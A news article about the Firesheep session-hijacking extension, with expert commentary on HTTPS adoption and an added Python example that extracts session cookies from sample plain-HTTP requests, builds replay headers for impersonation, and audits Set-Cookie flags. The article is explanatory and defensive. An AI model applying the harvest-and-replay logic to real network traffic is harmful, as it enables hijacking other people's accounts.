This week there has been plenty of online discussion about a Mozilla Firefox extension that captures session cookies sent in clear text over shared networks.
Named Firesheep, it is free, open source and available now for Mac OS X and Windows, with Linux support on the way. It was described by Veracode CTO Chris Wysopal as 'to clear text web sessions as chainsaws are to trees, everyone gets to be a lumberjack'.
According to its creator Eric Butler, the software was downloaded 129,000 times on the first day after its announcement and it became a top ten trending topic on Google and Twitter. Butler, who describes himself as a freelance web application and software developer from Seattle, Washington, said that the coverage regarding harvesting credentials over public WiFi networks was very welcome and the real story was not the success of Firesheep but the fact that something like it is even possible.
He said: “The same can be said for the recent news that Google Street View vehicles were collecting web traffic. It should not be possible for Google or anybody to collect this data, whether intentional or not. Going forward the metric of Firesheep's success will quickly change from amount of attention it gains, to the number of sites that adopt proper security. True success will be when Firesheep no longer works at all.
“An across-the-board improvement in website security will take time, but people are beginning to see the risks of using insecure websites right now. Unfortunately there has been a lot of misinformation about what people can do to protect themselves.”
Basically, Firesheep listens on a shared network (an open WiFi hotspot, for example) for HTTP traffic that is not encrypted, picks out the session cookies that sites such as Facebook and Twitter send with every request after login, and lets the user replay them. Because the site identifies a logged-in user by that cookie rather than by re-checking the password, anyone holding a copy of it can impersonate the user for as long as the session lasts.
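The following is an added example, not Firesheep's own code, showing the two halves of the problem just described: the attacker's side, which sniffs plain-HTTP requests for the cookies that make up a login session on a known site and builds the headers needed to replay them, and the server's side, which checks whether a Set-Cookie header carries the attributes that would have kept the cookie off the wire in clear text. The captured requests, host names and cookie names are constructed for the example; the per-site "handler" table is modelled on Firesheep's approach of knowing which cookies matter for which site, not copied from it.

```python
from dataclasses import dataclass, field

# Constructed sample traffic: three plain-HTTP requests exactly as a sniffer on
# a shared network would see them. Hosts and cookie values are hypothetical.
CAPTURED_REQUESTS = [
    ("GET /home.php HTTP/1.1\r\n"
     "Host: www.social.example\r\n"
     "Cookie: datr=4xH2; c_user=100000123; xs=9f8e7d6c\r\n"
     "User-Agent: Mozilla/5.0\r\n\r\n"),
    ("GET /logo.png HTTP/1.1\r\n"
     "Host: static.cdn.example\r\n"
     "User-Agent: Mozilla/5.0\r\n\r\n"),
    ("GET /mail/inbox HTTP/1.1\r\n"
     "Host: mail.webmail.example\r\n"
     "Cookie: lang=en; SID=ZmFrZXNlc3Npb24\r\n\r\n"),
]

# Per-site "handlers": the cookie names that together identify a logged-in
# session on each host (hypothetical names, modelled on Firesheep's handlers).
HANDLERS = {
    "www.social.example": ("c_user", "xs"),
    "mail.webmail.example": ("SID",),
}


@dataclass
class Session:
    host: str
    cookies: dict = field(default_factory=dict)

    def replay_headers(self):
        """Headers an attacker would attach to a request to impersonate this user."""
        jar = "; ".join(f"{k}={v}" for k, v in self.cookies.items())
        return {"Host": self.host, "Cookie": jar}


def parse_request(raw):
    """Split a raw HTTP/1.x request into (request line, headers dict, names lower-cased)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_cookies(cookie_header):
    """Parse 'a=1; b=2' into a dict; values are kept verbatim."""
    cookies = {}
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def harvest_sessions(raw_requests, handlers=HANDLERS):
    """Return a Session for every request that carries the complete set of
    session cookies for a host we have a handler for. Requests to other hosts,
    or with only non-session cookies, are ignored."""
    found = []
    for raw in raw_requests:
        _, headers = parse_request(raw)
        host = headers.get("host", "")
        wanted = handlers.get(host)
        if not wanted or "cookie" not in headers:
            continue
        jar = parse_cookies(headers["cookie"])
        if all(name in jar for name in wanted):
            found.append(Session(host, {n: jar[n] for n in wanted}))
    return found


# Defender side: the attributes a session cookie should be set with. "Secure"
# stops the browser ever sending the cookie over plain HTTP (so a sniffer sees
# nothing, provided the site is reachable over HTTPS); "HttpOnly" keeps it away
# from page scripts.
SESSION_FLAGS = ("Secure", "HttpOnly")


def missing_cookie_flags(set_cookie_header):
    """Return the hardening attributes absent from a Set-Cookie header value."""
    attrs = {a.strip().split("=")[0].lower()
             for a in set_cookie_header.split(";")[1:]}
    return [f for f in SESSION_FLAGS if f.lower() not in attrs]


if __name__ == "__main__":
    for s in harvest_sessions(CAPTURED_REQUESTS):
        print(s.host, s.replay_headers()["Cookie"])
    print(missing_cookie_flags("xs=9f8e7d6c; Path=/; Domain=.social.example"))
```

Run against the constructed capture, the harvester reports two hijackable sessions (the social-network and webmail requests) and skips the CDN request, which carries no cookie at all; the audit of the sample Set-Cookie header reports both `Secure` and `HttpOnly` as missing. The point of the defender-side check is the one the article's commentators make: if the cookie had been marked `Secure` and the site served over HTTPS throughout, the first half of the script would have had nothing to harvest.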
Robert Chapman, CEO of Firebrand Training, said: "Firesheep demonstrates how trusting the general public can be. It is more concerning how it demonstrates how easy it is to abuse that trust."
Tom Ilube, co-founder of online identity company Garlik, commented that while the Firesheep extension was written in the hope of prompting major sites such as Facebook, Twitter and webmail providers to ensure that all of their services are provided over HTTPS, the ease with which it can be used will surely now put more people at risk.
Luis Corrons, technical director of PandaLabs, commented that many people will be familiar with the dangers of connecting through public WiFi, as anyone could be sniffing the traffic and capture the data.
He said: “Don't panic. Yes, this is bad, but there are some countermeasures to take. The best solution would be to use SSL encryption in all communications, but this has to be supported in the server side, so that won't be happening (at least massively) anytime soon. Meanwhile, you should use HTTPS Everywhere, which will force you to use HTTPS when connecting to some major websites.”
Paul Ducklin, head of technology at Sophos, called this a 'campaign to push website operators towards encryption everywhere'. He said: "You can debate the morality of Butler's open publication and promotion of his session-hijacking software all you like, but he makes a clear and important point. (Just don't access anyone else's account with his software, even for fun.)
“Many websites, notably those which allow you to access and use any sort of personalised information, or to perform online activities for which you might be held accountable, are short-changing you by using HTTPS only at the start of your session. They should use secure HTTP throughout, protecting both the personal data you choose to upload and download, and the authentication token they use to identify you.
“There are some reasonable exceptions to full-time HTTPS - for example if a site uses a login merely to limit access to its own unpersonalised intellectual property, such as software downloads or news articles. In general, however, an SSL login should be followed by an SSL session.”
He said that the traditional excuse for not using encryption everywhere is that SSL, the cryptographic layer of HTTPS, is expensive. There are two responses: firstly, so what? It is cheaper to avoid any form of security for your customers; and secondly, says who? Google claims it has enabled HTTPS for all aspects of its Gmail service without adding any extra processing power.
Facebook said that its login process uses SSL; however, the rest of the site is not encrypted, so once you have entered your username and password the session cookie that identifies you is sent with every subsequent page request over plain HTTP, where anyone on the same network can read it.
Nick O'Neill, writing on the allfacebook.com blog, said: “This is not a problem when you are on a secure network. However, when you are on an open WiFi network, it means that anyone else on the same network can spoof the cookie and log in as you. As far as Facebook is concerned, they are seeing the same cookie coming from the same IP address.”
He approached Facebook about this, and a spokesman said it was working on adding SSL access to Facebook as an option, but generally would advise people not to send sensitive information from a public network. A statement said: “We have been making progress testing SSL access to Facebook and hope to provide it as an option in the coming months. As always, we advise people to use caution when sending or receiving information over unsecured WiFi networks. This tip and others can be found on the Facebook security page.
“Be careful about the information you access or send from a public wireless network. To be on the safe side, you may want to assume that other people can access any information you see or send over a public wireless network. Unless you can verify that a hotspot has effective security measures in place, it may be best to avoid sending or receiving sensitive information over that network.”
This incident, which I predict will not be going away any time soon, will be seen as a successful venture if it achieves one thing: promoting the use of encrypted sessions and a greater awareness of how data is exposed on a public network. If, however, the tool is snapped up by the black hats, there could be questions to be answered by the developers.